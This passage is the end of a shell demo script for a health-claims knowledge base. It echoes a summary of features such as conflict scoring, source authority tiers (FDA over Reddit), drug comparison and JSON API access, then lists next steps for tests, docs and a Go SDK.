echo -e " - Conflict score quantifies disagreement"
echo ""
echo -e " 3. ${CYAN}Source Hierarchy${NC}"
echo -e " - LayeredConsensus groups by authority tier"
echo -e " - FDA data weighted higher than Reddit"
echo ""
echo -e " 4. ${CYAN}Drug Comparison${NC}"
echo -e " - Side-by-side view of multiple subjects"
echo -e " - Each drug's claims with provenance"
echo ""
echo -e " 5. ${CYAN}Data Exploration${NC}"
echo -e " - Discover available predicates"
echo -e " - Different subject patterns for efficacy vs safety"
echo ""
echo -e " 6. ${CYAN}API Integration${NC}"
echo -e " - JSON output for programmatic access"
echo -e " - Ready for AI agents and web apps"
echo ""
echo -e "${BOLD}Consumer Health Value Proposition:${NC}"
echo -e " - ${GREEN}See all perspectives${NC}, not just the loudest"
echo -e " - ${GREEN}Understand source authority${NC} (FDA vs. Reddit)"
echo -e " - ${GREEN}Make informed decisions${NC} with conflict awareness"
echo ""
echo -e "${BOLD}Next Steps:${NC}"
echo -e " - Run Consumer Health UAT: ${CYAN}cargo test -p stemedb-ontology --test consumer_health_uat${NC}"
echo -e " - Read the guide: ${CYAN}docs/app-concepts/consumer-health.md${NC}"
echo -e " - Try the Go SDK: ${CYAN}sdk/go/steme/${NC}"
echo ""
print_success "Demo complete!"